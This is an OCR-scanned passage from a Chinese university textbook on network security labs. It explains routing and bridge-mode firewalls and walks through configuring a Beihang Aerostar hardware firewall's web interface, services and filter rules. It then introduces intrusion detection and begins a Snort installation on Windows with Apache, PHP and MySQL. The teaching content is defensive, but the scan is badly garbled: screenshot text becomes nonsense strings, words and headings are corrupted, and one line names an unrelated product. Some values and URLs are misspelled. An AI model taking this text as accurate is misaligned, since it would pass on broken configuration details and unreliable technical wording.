路 由 动作 包括 两 项 基本 内 容 : 寻 径 和 转发 。 寻 径 即 判定 并 选择 到 达 目 的 地 的 最 佳 路 
径 ， 由 路 由 选择 算法 来 实现 。 由 于 涉及 不 同 的 路 由 选择 协议 和 路 由 选择 算法 ， 要 相对 复 
杂 一 些 。 路 由 选择 算法 将 收集 到 的 不 同 信息 填 入 路 由 表 中 ， 根 据 路 由 表 可 将 目的 网 络 与 
下 一 站 Cnexthop) 的 关系 告诉 路 由 器 。 路 由 器 间 互 通信 息 进行 路 由 更 新 ， 更 新 维护 路 由 
表 使 之 正确 反映 网 络 的 拓扑 变化 ， 并 由 路 由 器 根据 量度 来 决定 最 佳 路 径 。 转 发 即 沿 寻 径 
好 的 最 佳 路 径 传 送信 息 分 组 。 路 由 器 首先 在 路 由 表 中 查找 ， 判 明 是 否 知道 如 何 将 分 组 发 
送 到 下 一 个 站 点 (路 由 器 或 主机 ), 如 果 路 由 器 不 知道 如 何 发 送 分 组 , 通常 将 该 分 组 丢弃 ; 
否则 ， 就 根据 路 由 表 的 相应 表 项 将 分 组 发 送 到 下 一 个 站 点 ， 如 果 目 的 网 络 直接 与 路 由 器 
相连 ， 路 由 器 就 把 分 组 直接 送 到 相应 的 端口 上 。 

2. 网 桥 模式 防火 墙 

网 桥 模 式 防火 墙 与 传统 防火 墙 不 同 。 通 常 一 个 防火 墙 像 一 个 路 由 器 一 样 工作 : 内 部 
系统 被 设置 为 将 防火 墙 看 作 是 通 向 外 部 网 络 的 网 关 ， 并 且 外 部 的 路 由 器 被 设置 为 将 防火 
墙 看 作 是 连 往 内 部 被 保护 的 网 络 的 网 关 。 一 个 网 桥 则 是 一 个 连接 一 个 或 多 个 网 段 的 设备 ， 
在 各 个 网 段 之 间 转 发 数据 ， 而 网 络 中 其 他 设备 并 不 会 感觉 到 网 桥 存在 。 因 此 ， 此 模式 也 
通常 称 为 透明 模式 。 

【实验 环境 】 

硬件 防火 墙 实验 所 采用 的 网 络 结构 如 图 8-2 所 示 。 


【实验 步骤 】 
本 实验 内 容 包 括 以 下 几 个 方面 。 
e 登录 系统 
设置 DNS、 网 关 等 项 
内 部 用 户 设置 ， 通 过 防火 墙 进行 远程 网 页 访问 
查看 系统 状态 、 网 络 状 态 、 会 话 状态 、 系 统 日 志 
设置 防火 墙 规则 ， 禁 止 某 些 端口 和 IP 
通过 内 部 用 户 验证 防火 墙 规则 是 否 生效 
e 设置 服务 
具体 实验 步骤 如 下 。 
1. 配置 方式 
Beihang Aerostar Firewall 系列 安全 平台 可 以 通过 多 种 方式 进行 配置 。 
1) 串口 超级 终端 
通过 Beihang Aerostar Firewall 系列 安全 平台 的 监控 口 ， 可 以 访问 系统 的 Console 界 
面 , 该 界面 是 标准 的 Linux Shell 界面 。 在 Console 界面 上 可 以 完全 控制 Beihang Aerostar 
Firewall 系列 安全 平台 的 各 种 功能 。 具 体 串 口 设置 : 波 特 率 为 19200， 数据 位 为 8， 奇偶 
校 验 为 无 ， 停 止 位 为 1， 数据 流 校 验 为 无 。 
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i 


172.16.3.1 
区 防火墙 
192.168.3.1 


192.168.3.11~192.168.3.20 


图 8-2 硬件 防火 墙 实验 所 采用 的 网 络 结构 图 


2) Telnet 方 式 

Beihang Aerostar Firewall 系列 安全 平台 带 有 两 个 以 太 网 接口 ， 通 过 Telnet 也 可 以 访 
问 系统 的 Shell 界面 ， 这 是 标准 的 Linux Shell。 通 过 该 界面 也 可 以 完全 控制 Beihang 
Aerostar Firewall 系列 安全 平台 的 各 种 功能 。Telnet 只 能 在 指定 网 口 连接 。 

3) Web 方式 

Beihang Aerostar Firewall 系列 安全 平台 支持 通过 Web 界面 访问 和 控制 系统 , 提供 的 
Web 界面 简单 明了 ， 又 能 完成 必需 的 功能 配置 ， 是 推荐 使 用 的 配置 方式 。Web 只 能 在 


指定 网 口上 使 用 。 
在 192.168.3.0/24 网 段 的 终端 PC 上 ,打开 浏览 器 输入 “https://192.168.3.1:1080”， 出 
现 的 登录 页 面 如 图 8-3 所 示 。 
= 
管理 员 登 录 
Arc 
za. 
ose 


图 8-3 ”硬件 防火 墙 登录 界面 
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——: 第 8 章 防火 墙 mm 


2. 登录 
输入 正确 的 账号 和 密码 ， 登 录 后 界面 如 图 8-4 所 示 。 
加 系统 配置 a 
侣 安全 对 象 AMOR: XH E 系统 状态 》 系 统 信息 
OMA 
回 用 户 管理 RRB 会 话 状 态 
回 虚拟 专 网 KRMA: 20119168138154 系统 启动 时 间 :4 小 时 1 分 钟 55 秒 
e 高 级 功能 asema: 国 es CPW 占用 率 : ox 
O 系统 维护 wean: I s EL CTS 
主机 各: serostar 软件 版 本 : 3.8.060426 
Bogs: 
eu: 192 168.2. 1/255. 255.255.0 BY 
eut " 
th2 none "|" 
ths = 172.16.2.1/255.255.255.0 M 


网 口 占 用 率 : lo 


图 8-4 ”登录 成 功 后 显示 的 系统 信息 


左边 显示 系统 的 一 级 、 二 级 菜单 ， 右 下 为 配置 区 ， 如 果 一 个 二 级 菜单 下 有 多 项 配置 ， 
配置 区 会 出 现 三 级 菜单 。 

3. 系统 配置 

系统 配置 下 的 配置 项 用 于 防火 墙 的 系统 状态 、 基 本 设置 、 网 络 设置 、 防 火 墙 自 带 服 
务 的 设置 以 及 多 重 ADSL 拨号 的 设置 。 

e 系统 状态 包含 系统 信息 和 会 话 状态 。 

e 基本 设置 包含 主机 名 修改 、 系 统 时 间 修 改 、 管 理 员 密码 修改 、IP 地 址 绑 定 以 及 日 

志 服 务 器 设置 。 

e 网 络 设置 包含 网 络 接口 配置 、VLAN 设置 以 及 静态 路 由 的 管理 。 

e 服务 设置 中 各 种 服务 的 配置 信息 修改 ,包含 DNS、DHCP、VPN、SNMP 和 SQUID. 

e ADSL 设置 中 用 户 可 以 进行 多 重 ADSL 的 拨号 。 


系统 信息 页 面 显示 了 当前 系统 的 运行 信息 如 图 8-5 所 示 )。 
5. 基本 设置 


基本 设置 包 插 主机、 时间、 修改 密码 、IP 地 址 绑 定 和 日 志 服务 器 设置 5 项 。 
6. IP 地 址 绑 定 

IFANE IP 地 址 与 MAC 地 址 。 

7. 日 志 服务 器 设置 

用 于 设置 接受 防火 墙 日 志 信息 的 服务 器 地 址 。 


8. 网 络 
网 络 包含 网 卡 设 置 ，ADSL 以 及 静态 路 由 的 管理 。 
1) 网 口 信息 


显示 网 口 信息 列表 如 图 8-6 所 示 。 
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目前 所 处 位 置 : 系统 配置 > 系统 状态 > 会 话 状态 


系统 信息 


源 地 址 : 目的 地 址 : [ waa: 目的 端口 : 外 


EU 
do 


J Pe @erene one 


会 话 状态 


协议 


tep 


超时 时 间 
431998 
118 
118 
118 


usu 
192. 168. 2. 20 
192. 168.2. 20 
192. 168. 2.20 
192. 168.2. 20 
192. 168. 2.20 
192. 168.2. 20 
192. 168.2. 20 
192. 168. 2.20 
192. 168. 2.20 


目的 地 址 
182.168.2.1 
182.168.2.1 
192.168.2.1 
192.168.2.1 
192.168.2.1 
182.168.2.1 
192.168.2.1 
182.168.2.1 
192.168.2.1 


图 8-5 ”防火墙 系统 会 话 状态 


目前 所 处 位 置 ;系统 配置 》 网 络 设置 》 网 口 信息 
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网 口 信息 
A 工作 模式 
eto — 自 定义 
ethl 禁用 
eth2 禁用 
eth3 — BEM 


VLAN 


了? 地址 


路 由 


192 168.2.1 255.255,255.0 


172,16,2.1 255.255.255.0 


图 8-6 


Https 管 理 Telnet 管 理 


yes no 
yes yes 
yer yes 
yes no 

网 口 信息 界面 


1-20 查询 会 话 总 数 ; 29 
xn Ammo 操作 = 


1493 1080 
1492 1080 
1491 1080 
1430 1080 
1489 1080 
1488 1080 
1487 1080 
1486 1080 


启用 Ping 服 务 器 


3 B9 E9 P9 B9 P9 D9 b9 B9 D9 


E 
9 
© 


操作 
gg 
gg 
gm 
ra 


列表 中 的 网 口 数 目 视 具 体 产品 而 定 ， 单 击 进入 网 口 设置 页 面 ( 如 图 8-7 所 示 )。 
2) 网 口 设置 
3) 路 由 设置 


e 添加 路 由 
。 编辑 路 由 


: 单 击 【添加 】 按 钮 ， 将 出 现 添加 /编辑 路 由 的 界面 。 
: 单 击 任何 一 路 由 条 目 后 的 国 链接 ， 将 进入 添加 /编辑 路 由 的 界面 。 
e 删除 路 由 : 单 击 任何 一 路 由 条 目 后 的 加 链接 ， 这 条 路 由 将 被 删除 。 


设 定 系统 服务 ， 包 括 DHCP、DNS、VPN、SNMP 和 SQUID 服务 。 


9. 服务 设置 
1) DHCP 
配置 DHCP 服务 器 如 图 8-8 所 示 。 


目前 所 处 位 置 : 系统 配置 > RARE > MOS > 修改 Eth0 


Mad 路 由 LE] 

amip IER: 
IP 地 址 : [192 168.21 € 自 定义 

C wr 

#885: [255.255.255.0 ms 

启用 Finz 服 务 器 : v FE jttps 管 理 

Fine 服 务 器 地 址 :[ 70000000007 三 Tanet 管 理 

sree: 国 F EROSEN 


me p 


图 8-7 网 口 信息 设置 界面 
目前 所 处 位 置 ; 系统 配置 > 服务 设置 > DHCP 


DHCP DES smr DDES 
起 始 地 址 : [192.168.0.2 结束 地 址 : [is2. 165 .0 254 
FPE: [255.255.255.0 租约 期 限 : [60000 
域名 服务 器 : |192. 168.0.254 FAX: |192.165.0.1 


BRAO: : |eth0 z] 
T^ 启动 时 运行 


bem] femmes) porre 


图 8-8 DHCP 服务 设置 


e。【 起 始 地 址 】: DHCP 可 以 分 配 的 地 址 段 的 起 始 地 址 ， 和 下 面 的 结束 地 址 一 起 形成 
一 个 地 址 段 ， 用 来 分 配给 客户 端 。 要 求 这 段 地 址 不 能 做 其 他 用 途 ， 否 则 容易 造成 
地 址 冲突 。 该 段 地 址 要 与 LAN 端口 的 IP 地 址 属于 同一 网 段 。 

【结束 地 址 】: DHCP 可 以 分 配 的 I 了 P 地 址 段 的 结束 地 址 。 

[FAR] 网 络 的 掩 码 ， 一 般 与 LAN 端口 的 掩 码 相 同 。 

【租约 期 限 】 默认 的 租用 时 间 ， 在 这 段 时 间 里 该 地 址 不 会 分 配给 别 的 设备 。 
【域名 服务 器 】: 客户 端 使 用 的 DNS 服务 器 地 址 。 一 个 正确 的 DNS 服务 器 地 址 ， 
客户 端 会 得 到 该 地 址 并 配置 自己 的 DNS 系统 。 如 果 Fortalice 系列 安全 平台 的 
DNS 服务 器 配置 正确 ， 可 以 使 用 LAN 端口 的 人 PP 地址 作为 DNS 服务 器 地 址 。 
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e [HX]: DHCP 客户 要 使 用 的 网 关 地 址 。 客 户 端 会 得 到 该 地 址 并 配置 本 地 默认 
网 关 。 

e 【监听 网 口 } 提供 DACP 服务 的 端口 。 

e 【启动 时 运行 】) 复 选 此 项 后 ， 系 统 启动 时 将 启动 该 服务 。 


2) DNS 
配置 DNS 服务 器 如 图 8-9 所 示 。 = ES 
o [E DNS 服务 器 】: 填写 DNS 服务 器 
地 址 。 
。【 备 选 DNS 服务 器 】. 填写 DNS 服务 器 mR: ETT 一 
地 址 。 
【启动 时 运行 】 选择 此 项 后 ， 系 统 启动 “BBS HEE 
时 将 启动 该 服务 。 T senza 
e 单 击 【 提 交 】 按 钮 后 保存 修改 。 a a 
10. 安全 对 象 
安全 对 象 菜单 下 的 内 容 用 于 在 定义 策略 之 图 8-9 DNS 配置 


前 ， 需 要 先 定义 需要 使 用 的 地 址 对 象 、 服 务 对 象 和 时 间 对 象 ， 定 义 策略 规则 时 将 使 用 到 
地 址 对 象 、 服 务 对 象 和 时 间 对 象 。 

1) 地 址 对 象 

对 象 用 于 定义 主机 、 网 络 、 地 址 范围 等 ， 用 于 防火 墙 规则 中 需要 指定 目标 和 源 的 选 
择 。 每 种 对 象 都 包含 名 称 和 备注 ， 对 象 的 名 称 可 以 使 用 字母 、 下 划 线 、 数 字 ， 长 度 最 长 
为 11B， 备 注 栏 能 输入 任意 字符 。 

(1) 组 : 管理 包含 一 个 或 多 个 对 象 的 组 ， 如 图 8-10 和 图 8-11 所 示 。 


组 主机 网 络 地 址 范围 


名 称 We 备注 动作 
subnetil linji D gp 


图 8-10 防火墙 对 象 操作 


(2) EBL: 显示 已 定义 的 主机 列表 ， 包 含 名 称 、IP 地 址 或 域名 、 硬 件 地 址 、 备 注 ， 
如 图 8-12 所 示 。 

(3) 网 络 : 显示 已 定义 的 网 络 对 象 列表 ， 包 括 名 称 、IP 地 址 、 掩 码 、 备 注 等 ， 如 
图 8-13 所 示 。 
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目前 所 处 位 置 : 安全 对 象 》 地 址 对 象 > dH > 添加 /修改 


组 主机 网 络 地 址 范围 


名 称 : [abaetil 


已 二 加 对 象 : 备注 : 


图 8-11 防火墙 组 对 象 操作 


目前 所 处 位 置 :安全 对 象 》 地 址 对 象 主机 


组 主机 网 络 地 址 范围 
名 称 芋 地 址 或 域名 硬件 地 址 备注 Li 
linji 182.168.2.19 pg 
benji 192. 168.2. 20 gps 
baidu 119.75. 218.70 @ 


图 8-12 防火墙 主 机 对 象 操作 
目前 所 处 位 置 ， 安 全 对 象 》 地 址 对 象 》 网 络 
组 主机 网 络 地 址 范围 

名 称 IPAE Lil mE HE 

all 0.0.0.0 0.0.0.0 à B 
subnet 192. 168. 0.0 255. 255, 255.0 a P 
本 机 192.168.2.20 255.255.255.0 Bg 
baidul 119. T5. 217. 108 255.255.0.0 B mg 


图 8-13 防火墙 网 络 对 象 操作 
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(4) 地 址 范围 ， 显示 已 定义 的 地 址 范围 对 象 的 列表 ， 列 表 中 包含 名 称 、 起 始 IP、 结 
WIP, iE, Wl 8-14 所 示 。 


目前 所 处 位 置 : 安全 对 象 》 地 址 对 象 > 地址 范围 
组 主机 网 络 地 址 范围 


BR 起 始 IP RIP 备注 操作 


e2 182.168.2.11 192. 168. 2. 30 B 


ar 


图 8-14 防火墙 地 址 对 象 操作 


2) 服务 对 象 
服务 对 象 定义 基于 各 种 协议 的 网 络 服务 类 型 ， 包 括 ICMP. IP. TCP. UDP, i 
图 8-15 所 示 。 


目前 所 处 位 置 : 安全 对 象 》 服 务 对象 》 预 定义 服务 


预定 义 服务 a IC r = E 
名 称 类 型 Wt Hrs 备注 a 
sys_ip IP 0 internet protocol, 


pseudo protocol number 


sys icnp iP 1 internet control message 


protocol 
: internet group 
SYSOP s 2 management protocol 
sys_eep IP 3 gateway-gateway protocol 
5 IP encapsulated in IP 

esl HE x (officially IF) 

sys_st IP 5 ST datagram mode 

ENG IP 6 transmission control xl 


图 8-15 防火墙 预 定义 服务 


系统 内 建 常用 服务 ， 包 括 基于 IP, UDP, TCP 的 各 种 服务 ， 服 务 名 称 以 “sys ” 开 
头 ， 其 后 跟 标 准 服务 名 称 。 

3) 时 间 对 象 

显示 已 添加 的 时 间 对 象 列表 ， 列 表 包 括 名 称 和 备注 等 项 。 
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11. 防火 墙 

1) 策略 配置 

防火 墙 策 略 配 置 如 图 8-16 所 示 。 

e 【人 允许 未 匹配 报 文通 过 】: 此 复 选 项 定义 防 


火 墙 的 默认 访问 规则 是 允许 或 拒绝 。 


e 【允许 已 连接 及 相关 报 文通 过 】: Asai HES 


选项 后 ， 防 火 墙 允许 所 有 已 连接 及 相关 报 
文通 过 ， 用 户 可 以 只 控制 新 建 连接 报 文 来 


o [LHE P2P 流量 通过 防火 墙 } 勾 选 此 复 选 


项 后 ， 防 火 墙 将 丢弃 所 有 被 识别 为 P2P 流 
ERIL, 包括 BT 下 载 、 Emule 等 产生 的 
流量 。 


2) tye 
显示 已 配置 的 过 滤 规 则 列表 ， 列 表 包 括 序号 、 源 、 目 的 、 服 务 、 动 作 、 状 态 、 时 间 
等 项 ， 如 图 8-17 所 示 。 


目前 所 处 位 置 : 防火墙 > 过 泥 规 则 > xfub > 添加 /修改 


usua 目的 地 址 转换 


Wo 区 许 未 匹配 报 文 通过 

M ”区 许 已 连接 及 相关 报 文 通过 

厂 阻止 P2? 流 量 通 过 防火 墙 
rz F7 


图 8-16 防火墙 策 略 配置 


策略 配置 mE BAER 目的 地 址 转换 
FS  — — 动作 : [拒绝 可 
Buc R Bw: pum R 
BE 国 mae y y d 
高 级 选项 : 区 
RS: W 已 连接 人 E) Mao) 隐 相关 M ineo) 
tan: [any 司 Amn: [any 司 


防火 墙 日 志 : [Rie 司 


Perse] re 


1 


图 8-17 ”防火 墙 规则 配置 


【序号 】 规则 的 序号 ， 决 定 规则 匹配 的 顺序 ， 序 号 由 系统 生成 ， 不 可 以 修改 。 
【动作 】: 对 匹配 当前 规则 的 数据 包 的 处 理 方法 ， 可 以 选择 【允许 】 或 【拒绝 】 
DEN 匹配 数据 包 的 源 地 址 ， 从 已 定义 的 对 象 中 选择 。 

【 目的】 匹配 数据 包 的 目的 地 址 ， 从 已 定义 的 对 象 中 选择 。 


【服务 】 匹配 数据 包 的 服务 类 型 。 


【时 间 】: 该 规则 的 生效 时 间 ， 从 已 定义 的 时 间 对 象 中 选择 。 
【高 级 选项 ]: 勾 选 此 项 后 ， 可 以 配置 以 下 更 多 选项 。 
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【状态 】 匹配 数据 包 在 连接 中 的 状态 ， 可 以 多 选 。 
[HHO]: 输出 数据 包 的 网 口 。 

[AWO] 输入 数据 包 的 网 口 。 

【防火 墙 日 志 】 选择 符合 此 条 规则 的 报 文 是 否 记录 日 志 。 


【实验 步 又 】 

(1) 登录 系统 

(2) 设置 DNS、 网 关 等 项 

GO 内 部 用 户 设 置 ， 通 过 防火 墙 进行 远程 网 页 访问 

(4) 查看 系统 状态 、 网 络 状态 、 会 话 状态 、 系 统 日 志 等 

(5) 设置 防火 墙 规 则 ， 禁 止 某 些 端口 和 人 P 

(6) 通过 内 部 用 户 验证 防火 墙 规则 是 否 生效 

(7) 设置 各 种 服务 

【实验 报告 】 

CD 利用 Web 方式 和 超级 终端 方式 分 别 登录 防火 墙 ， 分 析 两 种 登录 方式 的 优 缺 点 。 
(2) 设置 防火 墙 规则 对 象 ， 并 在 过 滤 中 使 用 ， 利 用 局 域 网 内 部 PC 测试 防火 墙 规则 


是 否 已 经 生效 (如 表 8-6 所 示 )。 


预 设 In 链 的 策略 为 拒绝 

本 机 可 以 ping 他 机 ， 而 阻止 他 机 ping 本 机 
他 机 可 以 ping 本 机 ， 而 阻止 本 机 ping 他 机 
开放 局 域 网 访问 外 部 网 站 

禁止 局 域 网 访问 外 部 网 站 

利用 vsftpd 为 远 端 提供 FTP 服务 ， 开 放 服 务 
利用 vsftpd 为 远 端 提供 FTP 服务 ， 禁 止 服务 
提供 Telnet 服务 ， 但 禁止 某 些 外 部 IP 访问 


EJ 


表 8-6 设置 规则 
规 则 操 作 设置 对 象 测试 结果 


提供 Telnet 服务 ， 关 闭 服 务 端口 


将 本 地 地 址 伪装 为 163.26.197.8 


84 


【思考 题 】 

(1) 考虑 路 由 式 防火 墙 与 网 桥 式 防火 墙 存在 哪些 方面 的 不 同 。 
(2) 考虑 如 何 实现 阻止 网 桥 外 部 接口 接收 具有 内 部 地 址 的 数据 包 。 
(3) 考虑 Web 控制 方式 的 优点 。 
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当 越 来 越 多 的 公司 将 其 核心 业务 向 互联 网 转移 的 时 候 ， 网 络 安全 作为 一 个 无 法 回避 
的 问题 呈现 在 人 们 面前 。 传 统 上 ， 公 司 一 般 采 用 防火 墙 作为 安全 的 第 一 道 防 线 。 而 随 着 
攻击 者 知识 的 日 趋 成 熟 ， 攻 击 工 具 与 手法 的 日 趋 复杂 多 样 ， 单 纯 的 防火 墙 策略 已 经 无 法 
满足 对 安全 高 度 敏 感 的 部 门 的 需要 ， 网 络 的 防卫 必须 采用 一 种 纵深 的 、 多 样 的 手段 。 与 
此 同时 ， 当 今 的 网 络 环境 也 变 得 越 来 越 复杂 ， 各 式 各 样 的 复杂 的 设备 ， 需 要 不 断 升 级 、 
补漏 的 系统 使 得 网 络 管理 员 的 工作 不 断 加 重 ， 不 经 意 的 疏忽 便 有 可 能 造成 安全 的 重大 隐 
患 。 在 这 种 环境 下 ， 入 侵 检测 系统 成 为 安全 市 场 上 新 的 热点 ， 不 仅 愈 来 愈 多 地 受到 人 们 
的 关注 ， 而 且 已 经 开始 在 各 种 不 同 的 环境 中 发 挥 其 关键 作用 。 

“入 侵 ”(Intrusion) 是 个 广义 的 概念 ， 不 仅 包 括 被 发 起 攻击 的 人 《如 恶意 的 黑客 ) 
取得 超出 合法 范围 的 系统 控制 权 , 也 包括 收集 漏洞 信息 , 造成 拒绝 访问 (Denial of Service? 
等 对 计算 机 系统 造成 危害 的 行为 。 

入 侵 检测 Cntrusion Detection)， 顾 名 思 义 ， 是 对 入 侵 行为 的 发 觉 。 它 通过 对 计算 机 
网 络 或 计算 机 系统 中 的 若干 关键 点 收集 信息 并 对 其 进行 分 析 ， 从 中 发 现 网 络 或 系统 中 是 
否 有 违反 安全 策略 的 行为 和 被 攻击 的 迹象 。 进 行 入 侵 检测 的 软件 与 硬件 的 组 合 便 是 入 侵 
检测 系统 (Intrusion Detection System，IDS )。 与 其 他 安全 产品 不 同 的 是 ， 入 侵 检 测 系统 
需要 更 多 的 智能 ， 它 必须 可 以 将 得 到 的 数据 进行 分 析 ， 并 得 出 有 用 的 结果 。 一 个 合格 的 
入 侵 检测 系统 能 大 大 地 简化 管理 员 的 工作 ， 保 证 网 络 安全 的 运行 。 入 侵 检测 被 认为 是 防 
火 墙 之 后 的 第 二 道 安全 闸门 ， 在 不 影响 网 络 性 能 的 情况 下 能 对 网 络 进行 监测 ， 从 而 提供 
对 内 部 攻击 、 外 部 攻击 和 误 操 作 的 实时 保护 。 

具体 说 来 ， 入 侵 检 测 系统 的 主要 功能 如 下 。 
监测 并 分 析 用 户 和 系统 的 活动 。 
核查 系统 配置 和 漏洞 。 
评估 系统 关键 资源 和 数据 文件 的 完整 性 。 
识别 已 知 的 攻击 行为 。 
统计 分 析 异 常 行为 。 

e 操作 系统 日 志 管理 ， 并 识别 违反 安全 策略 的 用 户 活动 。 

IDS 是 一 种 网 络 安全 系统 ， 当 有 敌人 或 者 恶意 用 户 试图 通过 Internet 进入 网 络 甚至 计 
算 机 系统 时 ，IDS 能 够 检测 出 来 ， 并 进行 报警 ， 通 知 网 络 采取 措施 进行 响应 。 在 本 质 上 ， 
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入 侵 检测 系统 是 一 种 典型 的 “ 宕 探 设备 ”。 它 不 跨 接 多 个 物理 网 段 〈 通 常 只 有 一 个 监听 端 
口 )， 无 需 转 发 任何 流量 ， 而 只 需要 在 网 络 上 被 动 地 、 无 声息 地 收集 它 所 关心 的 报 文 即 可 。 

Hii, IDS 分 析 及 检测 入 侵 阶 段 一 般 通过 以 下 几 种 技术 手段 进行 分 析 : 特征 库 匹 配 、 
基于 统计 的 分 析 和 完整 性 分 析 。 其 中 前 两 种 方法 用 于 实时 的 入 侵 检测 ， 而 完整 性 分 析 则 
用 于 事后 分 析 。 

由 于 入 侵 检 测 系统 的 市 场 在 近 几 年 飞速 发 展 ， 许 多 公司 投入 到 这 一 领域 中 来 。 众 多 
内 外 的 安全 公司 也 都 推出 了 自己 相应 的 产品 , 但 入 侵 检 测 系统 还 缺乏 相应 的 技术 标准 。 
目前 ， 试 图 对 IDS 进行 标准 化 工作 的 有 两 个 组 织 : IETF 的 Intrusion Detection Working 
Group (IDWG) 和 Common Intrusion Detection Framework (CIDF)， 但 进展 非常 缓慢 ， 尚 
没有 被 广泛 接受 的 标准 出 台 。 


92 Windows 下 搭建 入 侵 检 测 平台 


【实验 目的 】 
掌握 在 Windows 中 搭建 基于 Snort 的 入 侵 检测 系统 (IDS)， 熟 悉 简 单 的 配置 方法 ， 
E 够 使 用 IDS 检测 并 分 析 网 络 中 的 数据 流 。 


【原理 简介 | 

在 实际 应 用 环境 中 ， 入 侵 检测 是 防火 墙 的 合理 补充 ， 帮 助 系统 对 付 网 络 攻击 ， 扩 展 
了 系统 管理 员 的 安全 管理 能 力 ， 包 括 安 全 审计 监视 、 进 攻 识 别 和 响应 ， 提 高 了 信息 安全 
基础 结构 的 完整 性 。 入 侵 检测 被 认为 是 防火 墙 之 后 的 另 一 道 安全 闸门 。 在 不 影响 网 络 性 
能 的 情况 下 ，IDS 能 对 网 络 进行 监测 ， 从 而 提供 对 内 部 攻击 、 外 部 攻击 和 误 操 作 进行 实 
时 监控 。 入 侵 检 测 也 是 保障 系统 动态 安全 的 核心 技术 之 一 。 

误 用 检测 和 异常 检测 作为 两 大 类 入 侵 检测 技术 ， 各 有 所 长 ， 又 在 技术 上 互补 。 误 用 
检测 是 建立 在 使 用 某 种 模式 或 者 特征 编码 方法 对 任何 已 知 攻击 进行 描述 这 一 理论 基础 上 
的 ;异常 检测 则 是 通过 建立 一 个 “正常 活动 ”的 系统 或 用 户 的 正常 轮廓 ， 凡 是 偏离 了 该 
正常 轮廓 的 行为 就 认为 是 入 侵 。 误 用 检测 精度 高 ， 却 无 法 检测 新 的 攻击 ， 异 常 检测 可 以 
检测 新 的 攻击 ， 却 有 比较 高 的 误 报 警 率 。 

目前 的 入 侵 检测 产品 中 ，Cisco 的 NetRanger, ISS 的 RealSecure 都 采用 的 是 误 用 检 
测 的 方法 ，AT&T 的 Computer Watch, NAI 的 CyberCop 则 是 基于 异常 检测 技术 。SRI 的 
IDES、NIDES 以 及 Securenet Corp 的 Securenet 同时 采用 了 以 上 两 种 技术 。 

Snort 是 一 个 强大 的 基于 误 用 检测 的 轻 量 级 网 络 入 侵 检测 系统 。 它 具有 实时 数据 流量 
分 析 和 日 志 IP 网 络 数据 包 的 能 力 ， 能 够 进行 协议 分 析 ， 对 内 容 进 行 搜索 /匹配 。 它 能 够 
检测 各 种 不 同 的 攻击 方式 ， 对 攻击 进行 实时 报警 。 

【实验 环境 】 


1. 硬件 环境 
(1) 装 有 Windows XP 和 Red Hat Linux 9.0 双 系 统 的 PC 一 台 。 
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(2) 网 络 中 包含 16 O Hub 一 个 。 
(3) 装 有 Windows 2000 Server 的 PC 一 台 ， 作 为 网 络 服务 器 。 
(4) R-J45 网 线 若 干 。 
2. 软件 环境 
1) acid-0.9.6b23.tar.gz 
http://www.cert.org/kb/acid 
这 是 基于 PHP 的 入 侵 检测 数据 库 分 析 控 制 台 。 
2) apache 2.0.46-win32-x86-no src.msi 
http://www.apache.org 
Windows 版 本 的 Apache Web 服务 器 。 
3) jpgraph-1.12.2.tar.gz 
http://www. aditus.nu/jpgraph 
PHP 图 形 库 。 
4) mysql-4.0.13-win.zip 
http://www.mysq.com 
Windows 版 本 的 MySQL 数据 库 服 务 器 。 
5) snort-2 0 0.exe 
http://www.snort.org 
Windows 版 本 的 Snort 安装 包 。 
6) WinPcap 3 0.exe 
http://winpcap.polito.it/ 
网 络 数据 包 截 取 驱 动 程序 。 


【实验 步骤 】 


入 侵 检测 系统 mm 


Snort 可 以 运行 在 UNIX/Windows 32 平台 上 。 第 一 步 就 是 要 在 Windows 下 完成 入 侵 
检测 系统 的 安装 与 配置 。 关 于 Snort 的 体系 结构 和 规则 ， 可 以 参考 其 相关 资料 。 


1. 首先 安装 Apache_2.0.46 For Windows 


(1) 选择 定制 安装 ， 安 装 路 径 修改 为 cvapache。 安 装 程序 会 自动 建立 c:\apache 2 H 
注意 : 安装 时 ,如 果 已 经 安装 了 JIS 并 且 启 动 了 Web Server, 则 会 与 Apache WebServer 
冲突 。 因 为 IS 的 WebServer 默认 在 TCP 80 端口 监听 ， 可 以 修改 Apache WebServer 为 
其 他 端口 。 


(2) 安装 完成 后 首先 修改 c:\apache2\conf\httpd.conf. 


(3) 定制 安装 完成 后 ，Apache Web Server 默认 在 8080 端口 监听 ， 修 改 为 其 他 不 常 


日 的 高 端 端口 。 


e 修改 Listen 8080 为 Listen 50080. 
o 安装 Apache 为 服务 方式 运行 。 
e 运行 命令 c:\apache2\bin\apache -k install。 
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(4) 添加 Apache 对 PHP 的 支持 。 

e 解压 缩 php-4.3.2-Win32.zip 至 c:\php. 

复制 php4ts.dll 至 %systemroot%\system32。 

复制 php.ini-dist 至 %systemroot%\php.ini。 

修改 php.iniextension=php_gd2.dll, 同 时 复制 c:\php\extension\php_gd2.dll 至 %syste- 
mroot%\。 

(5) 启动 Apache 服务 。 

运行 net start apache2 命令 。 

在 c:\apache2\htdocs 目录 下 新 建 test.php。test.php 文件 内 容 如 图 9-1 所 示 。 


图 9-1 test.php 文件 内 容 


V 


mies n] 以 访问 http://192.168.0.15:50080/test.php 测试 PHP 是 否 安装 成 功 。 
2. 安装 Snort 2 0_0 
直接 双击 snort-2_0 0.exe 安装 文件 。Snort 将 自动 使 用 默认 安装 路 径 ci\snort， 如 
图 9-2 所 示 。 
Installation ee l 
Select which configuration options you want installed 


9-2 ”安装 Snort 


ms 第 9 章 入 侵 检 测 系统 me 


3. 安装 MySQL 
COD 默认 安装 MySQL Æ c:\mysql, Z$ MySQL 为 服务 方式 ， 运 行 c:\mysql\bin\ 
Imysqld-nt -install 启动 MySQL 服务 ， 如 图 9-3 所 示 。 


C:WINDOWS:system32'cmd.exe 


wysq1 upgrade „exe ny-print defaults.exe perror.exe 
'eplace.exe 


S fui 55,788,544 FË 


4.511,145,984 可 用 字 节 


Program Files\MySQL\MySQL Server 5.@\bin>nysqld-nt -install 
[Service successfully installed. 


图 9-3 启动 MySQL 服务 


(2) 运行 net start mysql， 启 动 服务 。 

注意 : Windows 2003 Server 下 如 果 出 现 不 能 启动 MySQL 的 情况 ， 新 建 my.ini AS 
如 图 9-4 所 示 。 注意 其 中 的 basedir 和 datadir 目录 是 否 指向 了 正确 的 目录 , 然后 把 my.ini 
复制 到 %systemroot% 目 录 下 就 可 以 了 。 


[EE 


as 
= 
图 
m 
3c 
留 
& 
È 


[mysqld] $ 
basedir=C:\MySOL$ 
bind-address-127.0.0.1$ 
datadir=C:\MySQL\data$ 


Joven Files 本 


I Open 


afl 


图 9-4 my. ini 内 容 


